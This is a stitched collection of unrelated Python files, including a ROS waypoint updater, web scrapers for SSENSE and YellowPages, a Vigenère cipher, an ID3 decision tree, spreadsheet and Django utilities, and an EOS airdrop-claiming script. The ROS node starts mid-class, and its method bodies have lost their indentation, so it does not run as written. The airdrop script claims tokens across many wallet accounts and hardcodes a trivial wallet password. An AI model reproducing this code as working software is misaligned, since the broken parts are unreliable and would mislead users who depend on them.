        #rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb, queue_size=1)
        rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb, queue_size=1)
        self.base_wp_sub = rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)
        rospy.Subscriber('/current_velocity', TwistStamped, self.current_velocity_cb)
        rospy.Subscriber('/traffic_waypoint', Intersection, self.traffic_waypoint_cb)
        # TODO: Add a subscriber for /traffic_waypoint and /obstacle_waypoint below
        self.final_waypoints_pub = rospy.Publisher('final_waypoints', Lane, queue_size=1)
        # Subscribe to ground truth traffic light array for development
        # TODO: Add other member variables you need below
        # Latest ego state (None/0 until the first callbacks arrive).
        self.car_x = None
        self.car_y = None
        self.car_yaw = None
        self.car_pose = None
        self.car_velo = 0.0
        self.car_closest_wp = None
        self.first_waypoint = 0
        self.base_waypoints = None
        self.tl_list = None # list of all traffic lights
        self.tl_X = None # closest traffic light X
        self.tl_Y = None # closest traffic light Y
        self.tl_S = None # closest traffic light state
        self.tl_wp = None # nearest Waypoint to the next light
        self.tl_stop_wp = None
        self.tl_list = [] # NOTE(review): overwrites the None assigned above; the list form wins
        self.braking = 0  # 1 while decelerating toward a stop waypoint
        self.stop_at_wp = None
        self.target_velo = TARGET_SPEED
        rospy.spin()
def pose_cb(self, msg):
self.car_x = msg.pose.position.x
self.car_y = msg.pose.position.y
self.car_pose = msg.pose
if self.base_waypoints is None:
return
#need to know euler yaw angle for car orientation relative to waypoints
#for quaternion transformation using https://answers.ros.org/question/69754/quaternion-transformations-in-python/
quaternion = [msg.pose.orientation.x,
msg.pose.orientation.y,
msg.pose.orientation.z,
msg.pose.orientation.w]
euler = tf.transformations.euler_from_quaternion(quaternion)
self.car_yaw = euler[2]
self.car_closest_wp = self.get_closest_waypoint(self.car_x, self.car_y)
self.check_tl()
self.publishFinalWaypoints()
def publishFinalWaypoints(self):
#if not received base_waypoints message, not able to update final_waypoints
if self.base_waypoints is None:
return
closestWaypoint = self.car_closest_wp #self.get_closest_waypoint(self.car_x, self.car_y)
car_velocity = self.car_velo
target_velocity = self.target_velo
rospy.loginfo("Current car velo = %s", car_velocity)
#updating final_waypoints
rospy.loginfo("updating waypoints")
rospy.loginfo("publishing velocity %s", target_velocity)
self.first_waypoint = closestWaypoint
lenWaypoints = len(self.base_waypoints)
final_waypoints_msg = Lane()
for i in range(closestWaypoint, min(closestWaypoint + LOOKAHEAD_WPS, lenWaypoints)):
wp = self.base_waypoints[i]
new_final_wp = Waypoint()
new_final_wp.pose = wp.pose
new_final_wp.twist.twist.linear.x = wp.twist.twist.linear.x
if(self.braking == 1):
stop_line_wp = self.base_waypoints[self.stop_at_wp-2]
if (i >= self.stop_at_wp): # For waypoints ahead of intended stop point, set velocities 0
vel = 0.
else:
dist = self.dist(wp.pose.pose.position, stop_line_wp.pose.pose.position)
vel = math.sqrt(2 * MAX_DECEL * dist)
if (vel < 1.):
vel = 0
#rospy.loginfo("dist = %s,cal_vel = %s, vel = %s", dist, vel, wp.twist.twist.linear.x)
# Override velocity
new_final_wp.twist.twist.linear.x = min(vel,wp.twist.twist.linear.x)
#rospy.loginfo("velo %s = %s, car velo = %s",i,new_final_wp.twist.twist.linear.x, car_velocity)
final_waypoints_msg.waypoints.append(new_final_wp)
self.final_waypoints_pub.publish(final_waypoints_msg)
def waypoints_cb(self, msg):
#updating base_waypoints
if self.base_waypoints is None:
rospy.loginfo("rcvd base waypoints")
self.base_waypoints = msg.waypoints
def traffic_waypoint_cb(self,msg):
self.tl_X = msg.next_light.pose.pose.position.x
self.tl_Y = msg.next_light.pose.pose.position.y
self.tl_S = msg.next_light_detection
self.tl_wp = msg.next_light_waypoint
self.tl_stop_wp = msg.stop_line_waypoint
#self.check_tl()
def traffic_cb(self, msg):
#TODO: Callback for /traffic_waypoint message. Implement
#updating traffic light waypoints
self.tl_list = msg.lights
#rospy.loginfo("updated state = %s of TL 0 @ x = %s, y = %s", self.tl_list[0].state, self.tl_list[0].pose.pose.position.x, self.tl_list[0].pose.pose.position.y)
#rospy.loginfo("updated state = %s of TL 1 @ x = %s, y = %s", self.tl_list[1].state, self.tl_list[1].pose.pose.position.x, self.tl_list[1].pose.pose.position.y)
#rospy.loginfo("updated state = %s of TL 2 @ x = %s, y = %s", self.tl_list[2].state, self.tl_list[2].pose.pose.position.x, self.tl_list[2].pose.pose.position.y)
#rospy.loginfo("updated state = %s of TL 3 @ x = %s, y = %s", self.tl_list[3].state, self.tl_list[3].pose.pose.position.x, self.tl_list[3].pose.pose.position.y)
def obstacle_cb(self, msg):
# TODO: Callback for /obstacle_waypoint message. We will implement it later
pass
def get_waypoint_velocity(self, waypoint):
return waypoint.twist.twist.linear.x
def set_waypoint_velocity(self, waypoints, waypoint, velocity):
waypoints[waypoint].twist.twist.linear.x = velocity
def distance(self, waypoints, wp1, wp2):
dist = 0
dl = lambda a, b: math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2)
for i in range(wp1, wp2+1):
dist += dl(waypoints[wp1].pose.pose.position, waypoints[i].pose.pose.position)
wp1 = i
return dist
def get_closest_waypoint(self, X, Y):
closestLen = 100000
closestWaypoint = 0
for i in range(self.first_waypoint, len(self.base_waypoints)):
wp = self.base_waypoints[i]
dist = math.sqrt((X - wp.pose.pose.position.x)**2
+ (Y - wp.pose.pose.position.y)**2)
if dist < closestLen:
closestLen = dist
closestWaypoint = i
else:
break
closest_wp = self.base_waypoints[closestWaypoint]
heading = math.atan2(closest_wp.pose.pose.position.y - Y,
closest_wp.pose.pose.position.x - X)
if closestWaypoint < len(self.base_waypoints) - 1:
angle = abs(self.car_yaw - heading)
if (angle > math.pi/4):
closestWaypoint += 1
closestWaypoint %= len(self.base_waypoints)
return closestWaypoint
def get_closest_tl(self):
closestLen = 100000
closestTL = -1
for i in range(len(self.tl_list)):
tl = self.tl_list[i]
dist = math.sqrt((self.car_x - tl.pose.pose.position.x)**2
+ (self.car_y - tl.pose.pose.position.y)**2)
if dist < closestLen:
closestLen = dist
closestTL = i
closest_tl = self.tl_list[closestTL]
heading = math.atan2(closest_tl.pose.pose.position.y - self.car_y,
closest_tl.pose.pose.position.x - self.car_x)
angle = abs(self.car_yaw - heading)
if (angle > math.pi/4):
closestTL += 1
closestTL %= len(self.tl_list)
closest_tl = self.tl_list[closestTL]
closestLen = math.sqrt((self.car_x - closest_tl.pose.pose.position.x)**2
+ (self.car_y - closest_tl.pose.pose.position.y)**2)
rospy.loginfo("changing TL to %s", closestTL)
self.tl_Y = closest_tl.pose.pose.position.y
self.tl_X = closest_tl.pose.pose.position.x
self.tl_S = closest_tl.state
return closestTL
def check_tl(self):
if self.car_x is not None and self.tl_wp is not None:
closestWaypoint = self.tl_wp
rospy.loginfo("tl_x = %s, tl_y = %s, state = %s, WP = %s, stop_wp = %s", self.tl_X, self.tl_Y, self.tl_S, self.tl_wp, self.tl_stop_wp)
dist = self.distance(self.base_waypoints, self.car_closest_wp, closestWaypoint)
rospy.loginfo("closest visible tl at %s distance", dist)
# Our traffic_waypoint publishes only when the next light is red/orange or unknown.
#self.update_tl = True
if dist < 35 and dist > 18 and self.tl_S == 0: ### STOP!!!
self.target_velo = 0.0
self.braking = 1
self.stop_at_wp = self.tl_stop_wp
elif dist < 100 and dist > 34:
self.target_velo = 5
self.braking = 1
self.stop_at_wp = self.tl_stop_wp
else: ## FULL THROTTLE!!
self.target_velo = TARGET_SPEED
self.braking = 0
#rospy.loginfo("Setting velo to %s",self.target_velo)
def dist(self, p1, p2):
return math.sqrt(pow(p1.x-p2.x,2) + pow(p1.y-p2.y,2))
def current_velocity_cb(self, msg):
self.car_velo = msg.twist.linear.x
if __name__ == '__main__':
    try:
        # The constructor blocks inside rospy.spin() until shutdown.
        WaypointUpdater()
    except rospy.ROSInterruptException:
        rospy.logerr('Could not start waypoint updater node.')
|
import requests
import time
from bs4 import BeautifulSoup
import os
import re
import urllib.request
import json
# Goal: find all jackets priced above $2000 USD and download their pictures.
# func 1 => get_web_page(url): fetch a page, return resp.text (None on failure)
# func 2 => enter_every_page: walk all 39 result pages and parse every item
#           (brand name, item name, price, url of the picture)
# func 3 => save: download a picture into a folder named after the brand
# main   => filter items priced >= $2000 and download their pictures
url = "https://www.ssense.com/en-tw/men/jackets-coats"  # listing root (page 1)
def get_web_page(url):
    """Fetch *url* and return the response body, or None on a non-200 status."""
    response = requests.get(url)
    if response.status_code == 200:
        return response.text
    print('Invalid url:', response.url)
    return None
def enter_every_page(dom):
    """Collect jacket listings from every result page (1..39).

    The original duplicated the whole parsing routine for page 1 and for
    pages 2-39; the shared logic now lives in one helper.

    Args:
        dom: HTML text of the first results page (already fetched).

    Returns:
        list of dicts with keys brand_name, item_name, price, item_pic_link.
    """
    def _parse_items(page_dom):
        # One listing per <figure class="browsing-product-item">.
        soup = BeautifulSoup(page_dom, "html5lib")
        parsed = []
        for item in soup.find_all("figure", "browsing-product-item"):
            parsed.append({
                "brand_name": item.find("p", "bold").text.strip(),
                "item_name": item.find("p", "product-name-plp").text.strip(),
                "price": item.find("span", "price").text.replace("$", ""),
                # The second <meta> tag carries the image URL.
                "item_pic_link": item.find_all("meta")[1]["content"],
            })
        return parsed

    items = _parse_items(dom)
    # Pages 2..39 are fetched from the module-level `url`; a failed fetch
    # (get_web_page returns None) is skipped, matching the original behavior.
    for page in range(2, 39 + 1):
        new_dom = get_web_page(url + "?page=" + str(page))
        if new_dom:
            items.extend(_parse_items(new_dom))
    return items
def save(img_url, title):
    """Download *img_url* into a directory named after *title* (no-op if url is empty)."""
    if not img_url:
        return
    try:
        folder = title.strip()  # trim surrounding whitespace for the directory name
        if not os.path.exists(folder):
            os.makedirs(folder)
        filename = img_url.split('/')[-1]  # last path segment names the file
        urllib.request.urlretrieve(img_url, os.path.join(folder, filename))
        # urllib.request.urlretrieve(url, path) writes the picture to disk
    except Exception as err:
        print(err)
if __name__ == '__main__':
    # Fetch the first page once; the original fetched it twice.
    first_page = get_web_page(url)
    if first_page:
        all_items = enter_every_page(first_page)
        print(all_items)
        # range(len(all_items)) — the original's len(all_items)-1 skipped the last item.
        for i in range(len(all_items)):
            item = all_items[i]
            # Strip thousands separators so prices like "2,150" still parse.
            if int(item["price"].replace(",", "")) >= 2000:
                single_title = item["brand_name"]
                single_href = item["item_pic_link"]
                save(single_href, single_title)
|
# def max_difference(a):
# max_difference = -float("inf")
# for i in range(len(a)):
# for j in range(i+1, len(a)):
# if a[j] - a[i] > max_difference:
# max_difference = a[j] - a[i]
# return max_difference
def max_difference(a):
    """Return the largest a[j] - a[i] with i < j, in a single pass.

    Tracks the running minimum of the prefix seen so far; for an empty or
    single-element sequence the result stays -infinity.
    """
    best = float("-inf")
    lowest = float("inf")
    for value in a:
        gain = value - lowest
        if gain > best:
            best = gain
        lowest = min(lowest, value)
    return best
# print() calls — the original Python 2 print statements are a
# SyntaxError under Python 3.
print("Max difference is", max_difference([2, 3, 10, 2, 4, 8, 1]))
print("Max difference is", max_difference([7, 9, 5, 6, 3, 2]))
|
from typing import Optional
class vigenere_cipher:
    """Vigenère cipher that preserves the capitalization of each character.

    Fixes over the original:
    * The ``shift_left=False`` branches computed the key offset as
      ``ord(key_char) - 65`` even though the key is lowercased, shifting by
      ``key + 6 (mod 26)`` instead of ``key`` — now ``- 97`` everywhere.
    * The four nearly identical loops are collapsed into one helper; the two
      slightly different key error messages are unified.
    """

    def __init__(self):
        # Per-call record of which input characters were uppercase.
        self.capitalized = []

    # This function helps preserve capitalization
    def get_num(self, char, idx):
        """Map an alphabetic char to 0..25, recording its case; raise otherwise."""
        num = ord(char)
        if (num > 64 and num < 91):
            num = num - 65
            self.capitalized.append(True)
        elif (num > 96 and num < 123):
            num = num - 97
            self.capitalized.append(False)
        else : raise Exception("Please only use alphabetical characters in the text!")
        return num

    def _prepare_key(self, key: str) -> str:
        """Validate the key, strip whitespace and lowercase it."""
        if not key: raise Exception("Please enter a valid key!")
        key = ''.join(key.split()).lower()
        if (not key.isalpha()): raise Exception("Please only use alphabetical characters in the key for Vigenere cipher!")
        return key

    def _shift(self, text: str, key: str, sign: int) -> str:
        """Shift every character of *text* by sign * key offset, preserving case."""
        key_len = len(key)
        text = ''.join(text.split())
        result = ''
        self.capitalized = []
        for i, char in enumerate(text):
            # Key is lowercase, so its offset is always ord(c) - 97.
            key_val = ord(key[i % key_len]) - 97
            num = ((self.get_num(char, i) + sign * key_val) % 26) + 65
            if (not self.capitalized[i]): num += 32
            result += chr(num)
        return result

    def encipher(self, text: str, key: str, shift_left: bool = True):
        """Encrypt *text*: add the key when shift_left, subtract otherwise."""
        key = self._prepare_key(key)
        return self._shift(text, key, 1 if shift_left else -1)

    def decipher(self, text: str, key: str, shift_left: bool = True):
        """Decrypt *text*: the exact inverse of encipher with the same flags."""
        key = self._prepare_key(key)
        return self._shift(text, key, -1 if shift_left else 1)
|
import demistomock as demisto # noqa: F401
from CommonServerPython import *
def main() -> None:
    """Render the incident label `radar_files_modified` as a colored HTML banner.

    Green when the label value is falsy, red when files were modified,
    orange "No Results Found" when the lookup raises KeyError.
    """
    # Inline CSS fragments. Each style constant deliberately ends with '>'
    # because the f-strings below do not close the <h1 ...> tag themselves
    # — NOTE(review): confirm this renders as intended (the attribute value
    # is unquoted).
    ORANGE_HTML_STYLE = "color:#FF9000;font-size:275%;>"
    GREEN_HTML_STYLE = "color:#00CD33;font-size:275%;>"
    RED_HTML_STYLE = "color:#FF1744;font-size:275%;>"
    DIV_HTML_STYLE = "display:block;text-align:center;"
    try:
        # Resolve the incident label via the demisto "Print" command.
        radar_files_modified = demisto.executeCommand("Print", {"value": "${incident.labels.radar_files_modified}"})
        radar_files_modified = radar_files_modified[0]["Contents"]
        if not radar_files_modified:
            html = f"<div style={DIV_HTML_STYLE}><h1 style={GREEN_HTML_STYLE}{str(radar_files_modified)}</h1></div>"
        else:
            html = f"<div style={DIV_HTML_STYLE}><h1 style={RED_HTML_STYLE}{str(radar_files_modified)}</h1></div>"
    except KeyError:
        html = f"<div style={DIV_HTML_STYLE}><h1 style={ORANGE_HTML_STYLE}No Results Found</h1></div>"
    # Return the banner as an HTML note entry.
    demisto.results({
        'ContentsFormat': formats['html'],
        'Type': entryTypes['note'],
        'Contents': html
    })
# python2 uses __builtin__ python3 uses builtins
# (XSOAR executes scripts with __name__ set to the builtins module name)
if __name__ == '__builtin__' or __name__ == 'builtins':
    main()
|
from datetime import datetime
def notnight(func):
    """Decorator: run *func* only between 03:00 and 19:59 local time.

    Improvements over the original: arguments are forwarded to *func* and
    its return value is propagated (the wrapper previously accepted no
    arguments and always returned None). At night the call is refused and
    None is returned.
    """
    def wrapper(*args, **kwargs):
        if 3 <= datetime.now().hour < 20:
            print('You can shout')
            return func(*args, **kwargs)
        print('Maybe its night time.....SSH! donot shout')
        return None
    return wrapper
@notnight # shouting=notnight(shouting)
def shouting():
    """Demo function: prints a shout when the decorator allows it."""
    print('OHHHHHHHHHHHHHHHHHHHHHOOOOOOOOOOHOOOOOOOHO')

shouting()
import os
import json
from log import loggingSetting
from ut import pushaction, unlock, getAccounts, runPool, buyram
logger = loggingSetting("airdrop")
def main(password):
    """Placeholder batch-airdrop driver.

    All candidate claim/signup actions are kept below as commented-out
    examples; the live actions currently run from the __main__ block.
    """
    pass
    # for i in x[1:]:
    #     print(pushaction("betdicetoken", "signup", [i, "1000.0000 DICE"], i)) # 1000dice
    #     print(
    #         pushaction("xxxsevensxxx", "signup", [i, "10000.0000 SEVEN"], i) # 10000 SEVEN
    #     )
    #     print(pushaction("efinitysicbo", "claim", [i], i)) # 100 CHIPS
    #     print(pushaction("roulettespin", "login", [i, "gy2dgmztgqge"], i))
    #     print(pushaction("efinitychips", "claim", [i, "gy2dgmztgqge"], i))
    #     print(pushaction("grandpacoins", "mine", [i, "4,BTC", "gy2dgmztgqge"], i))
    #     print(pushaction("grandpacoins", "mine", [i, "4,ETH", "gy2dgmztgqge"], i))
    #     print(pushaction("grandpacoins", "mine", [i, "4,DOGE", "gy2dgmztgqge"], i))
    #     print(pushaction("poormantoken", "signup", [i, "0.0000 POOR"], i))
    #     print(pushaction("trybenetwork", "claim", [i], i))
    #     print(pushaction("wizznetwork1", "signup", [i, "0.0000 WIZZ"], i))
if __name__ == "__main__":
    password = "1"
    # Unlock the wallet before pushing any actions.
    unlock(password)
    accounts = getAccounts()

    def run(i):
        # Claim the three grandpacoins "mine" airdrops for account i.
        print(pushaction("grandpacoins", "mine", [i, "4,BTC", "gy2dgmztgqge"], i))
        print(pushaction("grandpacoins", "mine", [i, "4,ETH", "gy2dgmztgqge"], i))
        print(pushaction("grandpacoins", "mine", [i, "4,DOGE", "gy2dgmztgqge"], i))
        # print(pushaction("eosenbpocket", "signup", [i, "1000.0001 ENB", i], i))
        # t = pushaction("eoscubetoken", "signup", [i, "0.0000 CUBE"], i)
        # print(t)
        # t = pushaction("eosindiegame", "claim", [i, "100.0000 IGC"], i)
        # if b"you have already signed up" not in t:
        #     print(t)
        # if b"has insufficient ram" in t:
        #     buyram("gy2dgmztgqge", i, 2)
        #     print(pushaction("eosindiegame", "claim", ["100.0000 IGC", i], i))

    # Fan the claims out over all accounts in a worker pool.
    runPool(run, accounts)
    # run("gy2dgmztgqge")
|
import pandas as pd
import numpy as np
class ID3:
    """ID3 decision-tree learner; the last DataFrame column is the class label.

    Fix over the original: ``__gain_ratio`` divided by the split information,
    which is 0 for an attribute with a single observed value, raising
    ZeroDivisionError — it now returns 0.0 in that case.
    """

    """ Public Method """
    # Uses the ID3 algorithm to generate the decision tree
    @staticmethod
    def generate_tree(df: pd.DataFrame, attribute_dict: dict, use_gain_ratio: bool, use_pruning: bool) -> dict:
        """Build a decision tree for *df*.

        Args:
            df: training data; every column but the last is an attribute.
            attribute_dict: attribute name -> list of its possible values.
            use_gain_ratio: rank attributes by gain ratio instead of information gain.
            use_pruning: pre-prune partitions smaller than 1% of the data.

        Returns:
            nested dict {attribute: {value: subtree-or-class-label}}, {} if df is empty.
        """
        if len(df) == 0:
            return {}
        candidates = list(df.columns.values[:-1])
        # Pre-pruning threshold: 1% of the training-set size.
        ID3.__instance_threshold = len(df) // 100
        return ID3.__generate_tree(df, candidates, attribute_dict, use_gain_ratio, use_pruning)

    """ Private Helper Methods """
    # Helps generate the tree by recursively creating dictionaries
    @staticmethod
    def __generate_tree(df: pd.DataFrame, candidates: list, attribute_dict: dict, use_gain_ratio: bool,
                        use_pruning: bool) -> dict:
        class_label = df.columns[-1]
        # Base case #1: no attributes left to partition over -> most common class label
        if not candidates:
            return df[class_label].value_counts().idxmax()
        # Base case #2: entropy 0 -> every instance shares one class label
        if not ID3.__entropy(df):
            return df[class_label].iloc[0]
        # Base case #3: pre-pruning of small partitions
        if use_pruning and len(df) < ID3.__instance_threshold:
            return df[class_label].value_counts().idxmax()
        # Recursive case: split on the best remaining attribute
        tree, attribute_tree = {}, {}
        next_attribute = ID3.__next_attribute(df, candidates, use_gain_ratio)
        updated_candidates = candidates.copy()
        updated_candidates.remove(next_attribute)
        for attribute_value in attribute_dict[next_attribute]:
            partitioned_df = df[df[next_attribute] == attribute_value]
            # Recurse only if the partitioned DataFrame is not empty
            if len(partitioned_df) != 0:
                attribute_tree[attribute_value] = ID3.__generate_tree(partitioned_df, updated_candidates,
                                                                      attribute_dict, use_gain_ratio, use_pruning)
            # Empty partition -> most common class label of the parent
            else:
                attribute_tree[attribute_value] = df[class_label].value_counts().idxmax()
        tree[next_attribute] = attribute_tree
        return tree

    # Get the attribute that yields the highest gain
    @staticmethod
    def __next_attribute(df: pd.DataFrame, candidates: list, use_gain_ratio: bool) -> str:
        attribute_gains = {}
        for attribute in candidates:
            if use_gain_ratio:
                attribute_gains[attribute] = ID3.__gain_ratio(df, attribute)
            else:
                attribute_gains[attribute] = ID3.__information_gain(df, attribute)
        return max(attribute_gains, key=attribute_gains.get)

    # Calculates the information gain acquired from partitioning over attribute
    @staticmethod
    def __information_gain(df: pd.DataFrame, attribute: str) -> float:
        if len(df) == 0:
            return 0
        # Entropy before partitioning
        entropy_before = ID3.__entropy(df)
        # Weighted entropy after partitioning
        entropy_after = 0
        for attribute_value in df[attribute].unique():
            mask = df[attribute] == attribute_value
            partitioned_df = df[mask]
            entropy_after += len(partitioned_df) / len(df) * ID3.__entropy(partitioned_df)
        # Information gain = entropy before decision - entropy after decision
        return entropy_before - entropy_after

    # Calculates the Shannon entropy of the class-label column
    @staticmethod
    def __entropy(df: pd.DataFrame) -> float:
        class_ratios = []
        class_label = df.columns[-1]
        total_instances = len(df.index)
        for class_value in df[class_label].unique():
            mask = df[class_label] == class_value
            partitioned_instances = len(df[mask].index)
            class_ratios.append(partitioned_instances / total_instances)
        # Entropy equation: sum of -p * log2(p)
        return sum([-class_ratio * np.log2(class_ratio) for class_ratio in class_ratios])

    # Calculates the gain ratio acquired from partitioning over attribute
    @staticmethod
    def __gain_ratio(df: pd.DataFrame, attribute: str) -> float:
        information_gain = ID3.__information_gain(df, attribute)
        split_information = ID3.__split_information(df, attribute)
        # BUGFIX: a single-valued attribute yields split information 0;
        # the original raised ZeroDivisionError here.
        if split_information == 0:
            return 0.0
        return information_gain / split_information

    # Calculates the split information (entropy of the attribute-value distribution)
    @staticmethod
    def __split_information(df: pd.DataFrame, attribute: str) -> float:
        attribute_ratios = []
        total_instances = len(df)
        for attribute_value in df[attribute].unique():
            mask = df[attribute] == attribute_value
            partitioned_instances = len(df[mask])
            attribute_ratios.append(partitioned_instances / total_instances)
        return sum([-attribute_ratio * np.log2(attribute_ratio) for attribute_ratio in attribute_ratios])

    """ Private Field """
    # Minimum partition size before pre-pruning kicks in (set by generate_tree).
    __instance_threshold = 0
|
# import openpyxl
# wb=openpyxl.load_workbook('各班成绩表.xlsx')
# ws=wb.active
# rngs=list(ws.values)
# d={}
# for row in rngs[1:]:
# if row[0] in d.keys():
# d[row[0]]+=[row]
# else:
# d[row[0]]=[row]
# nwb=openpyxl.Workbook()
# for k,v in sorted(d.items()):
# nws=nwb.create_sheet(k)
# nws.append(rngs[0])
# for r in v:
# nws.append(r)
# nwb.remove(nwb.worksheets[0])
# nwb.save('拆分.xlsx')
import openpyxl

# Split the grade workbook into one worksheet per class, grouped by the
# first column.
wb = openpyxl.load_workbook("各班成绩表.xlsx")
ws = wb.active

# Materialize the rows once — the original re-read list(ws.values) inside
# the sheet loop, rescanning the whole worksheet for every output sheet.
rows = list(ws.values)
header, records = rows[0], rows[1:]

grade = dict()
for row in records:
    # Group rows by class name (column 0).
    grade.setdefault(row[0], []).append(row)

nwb = openpyxl.Workbook()
for k, v in sorted(grade.items()):
    nws = nwb.create_sheet(k)
    nws.append(header)
    for r in v:
        nws.append(r)
# Drop the default empty sheet created by Workbook().
nwb.remove(nwb.worksheets[0])
nwb.save("拆分到表.xlsx")
|
import pandas as pd
import os
# Resolve the Download_Data/Data directory relative to this script's parent.
cwd = os.getcwd()
project_wd = os.path.dirname(cwd)
download_wd = os.path.join(project_wd, "Download_Data")
data_wd = os.path.join(download_wd, "Data")
countries_wd = os.path.join(data_wd, "all_Countries.csv")
us_states_wd = os.path.join(data_wd, "us_States.csv")
fips_states_wd = os.path.join(data_wd, "fips_state.csv")
# Load the three source tables for downstream use.
countries = pd.read_csv(countries_wd)
us_states = pd.read_csv(us_states_wd)
state_codes = pd.read_csv(fips_states_wd)
|
# Django
from django.contrib import admin
# Models
from .models import Onboard
class OnboardAdmin(admin.ModelAdmin):
    """Admin configuration for Onboard: list, filter, search and order by account."""
    # NOTE(review): `model` is only meaningful on InlineModelAdmin; harmless
    # on a ModelAdmin — confirm intent before removing.
    model = Onboard
    list_display = ('account', 'isOnboarded')
    list_filter = ('account',)
    search_fields = ('account',)
    ordering = ('account',)

admin.site.register(Onboard, OnboardAdmin)
|
import requests
from bs4 import BeautifulSoup
import pandas as pd
import time
#srp-listing clickable-area paid-listing astro-dxc
#srp-listing clickable-area gump
#srp-listing clickable-area sp
#srp-listing clickable-area rd
#srp-listing clickable-area mdm
main_list = []
def extract(url):
    """Fetch one YellowPages results page and return all listing <div>s.

    The site marks listings with several different class combinations
    (paid vs organic placements); the original duplicated five find_all
    calls — we iterate over the class list instead, preserving order.
    """
    page = requests.get(url)
    soup = BeautifulSoup(page.content, 'html.parser')
    listing_classes = (
        'srp-listing clickable-area paid-listing astro-dxc',
        'srp-listing clickable-area gump',
        'srp-listing clickable-area sp',
        'srp-listing clickable-area rd',
        'srp-listing clickable-area mdm',
    )
    arts = []
    for cls in listing_classes:
        arts += soup.find_all('div', class_=cls)
    return arts
def transform(articles):
    """Extract business fields from listing tags and append them to main_list.

    A listing may omit the website link or the phone block; those fall back
    to placeholder strings. The original used bare ``except:`` clauses,
    which also swallowed KeyboardInterrupt/SystemExit — narrowed to
    ``Exception``.
    """
    for item in articles:
        name = item.find('a', class_='business-name').text
        address = item.find('p', class_='adr').text.strip().replace('\n', '')
        try:
            website = item.find('a', class_='track-visit-website')['href']
        except Exception:
            website = 'NO WEBSITE'
        try:
            tel = item.find('div', class_='phones phone primary').text.strip()
        except Exception:
            tel = 'NO TELLEPHONE'
        # NOTE: the key spellings ('Adress', 'Tellephone') are intentional —
        # load() selects DataFrame columns by these exact names.
        business = {
            'Name': name,
            'Adress': address,
            'Website': website,
            'Tellephone': tel
        }
        main_list.append(business)
    return
def load():
    """Dump the scraped main_list into an Excel file with fixed columns."""
    df = pd.DataFrame(main_list, columns= ["Name", "Adress", "Website", "Tellephone"])
    print(main_list)
    print(df)
    # NOTE(review): writing .xls needs the legacy xlwt engine, which modern
    # pandas no longer supports — confirm the environment or switch to .xlsx.
    df.to_excel('LA_Dentists.xls', index= False, columns= ["Name", "Adress", "Website", "Tellephone"])
# Scrape result pages 1..2, then write the Excel file. Stop early on any
# failure, but report why — the original bare `except: break` hid every
# error (network failures, parse errors, typos) silently.
for x in range(1, 3):
    print(f'Getting page {x}')
    try:
        articles = extract(f'https://www.yellowpages.com/search?search_terms=dentist&geo_location_terms=Los%20Angeles%2C%20CA&page={x}')
        transform(articles)
        time.sleep(2)  # polite delay between requests
    except Exception as e:
        print(f'Stopping at page {x}: {e}')
        break
load()
print('Saved to Excel')
import os
import logging
def logModul(topicName, fileName, log_dir=None):
    """Create a logger that logs INFO+ to the console and WARNING+ to a file.

    Fixes over the original:
    * ``logging.basicConfig`` inside the function installed a root handler,
      so every record was printed twice (once by our StreamHandler, once
      via propagation to root) — replaced by ``logger.setLevel``.
    * ``getLogger`` returns the same object for the same name, so repeated
      calls stacked duplicate handlers; handlers are now attached once.

    Args:
        topicName: logger name (log topic).
        fileName: log file name inside the log directory.
        log_dir: directory for the log file; defaults to '../logs' relative
            to the current working directory (the original behavior).

    Returns:
        The configured logging.Logger.
    """
    logger = logging.getLogger(topicName)
    logger.setLevel(logging.INFO)
    if log_dir is None:
        log_dir = os.path.join(os.path.dirname(os.getcwd()), 'logs')
    if not logger.handlers:
        ch = logging.StreamHandler()
        fh = logging.FileHandler(os.path.join(log_dir, fileName))
        fh.setLevel(logging.WARNING)
        formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
        ch.setFormatter(formatter)
        fh.setFormatter(formatter)
        logger.addHandler(ch)
        logger.addHandler(fh)
    return logger
# -*-coding:utf-8-*-
# def verify(num):
# if num > 0:
# print "正数"
# if num < 0:
# print "负数"
# if num == 0:
# print "零"
# num = float(raw_input("请输入一个数:"))
# verify(num)
# list = [2,7,6,8,10]
# print sum(list)
# avg = float(sum(list))/float(len(list))
# print avg
# list = []
# try:
# num = raw_input("请输入5个数字,以逗号隔开:")
# for i in num.split(','):
# list.append(float(i))
# avg = float(sum(list))/float(len(list))
# print avg
# except:
# print "输入有误"
# a = raw_input("请输入一个字符串:")
# # for i in a:
# # print i
# i = 0
# while i < len(a):
# print a[i]
# i = i + 1
# while True:
# num = raw_input("请输入一个0到100的数:")
# try:
# if float(num) > 0 and float(num) < 100:
# print "OK"
# break
# else:
# print "输入的数错误,请重新输入"
# except :
# print "输入的不是数字"
#
# stack = [] #定义堆栈列表
#
# def pushit():
# stack.append(raw_input('Enter new string:').strip())
#
# def popit():
# if len(stack) == 0:
# print 'Cannot pop from an empty stack!'
# else:
# print 'Removed [','stack.pop()',']'
#
# def viewstack():
# print stack
#
# CMDs = {'u':pushit,'o':popit,'v':viewstack}
# def showmenu():
# pr = """
# p(U)sh
# p(O)p
# (V)iew
# (Q)uit
# Enter choice:
# """
# while True:
# while True:
# try:
# choice = raw_input(pr).strip()[0].lower()
# except (EOFError,KeyboardInterrupt,IndexError):
# choice = 'q'
# print '\nYou picked:[%s]' % choice
# if choice not in 'uovq':
# print 'Invalid option,try again'
# else:
# break
#
# if choice == 'q':
# break
#
# CMDs[choice]()
#
# if __name__ == '__main__':
# showmenu()
# db = {}
#
# def newuser():
# prompt = 'login desired:'
# while True:
# name = raw_input(prompt)
# if name in db.keys():
# prompt = "name taken,try another:"
# continue
# else:
# break
# pwd = raw_input("passwd:")
# db[name]=pwd
#
# def olduser():
# name = raw_input("login:")
# pwd = raw_input("passwd:")
# passwd = db.get(name)
# if passwd == pwd:
# print 'welcome back ',name
# else:
# print "login incorrect"
#
# def showmenu():
# prompt = """
# (N)ew User Login
# (E)xisting User Login
# (Q)uit
# Enter choice:
# """
# done = False
# while not done:
# chosen = False
# while not chosen:
# try:
# choice = raw_input(prompt).strip()[0].lower()
# except (EOFError,KeyboardInterrupt):
# choice = 'q'
# print '\nYou picked:[%s]' % choice
# if choice not in 'neq':
# print 'invalid option,try again'
# else:
# chosen = True
# done = True
#
# newuser()
# olduser()
# if __name__ == "__main__":
# showmenu()
# #float_v1.0
# def safe_float(obj):
# try:
# return float(obj)
# except ValueError:
# pass
#float_v1.1
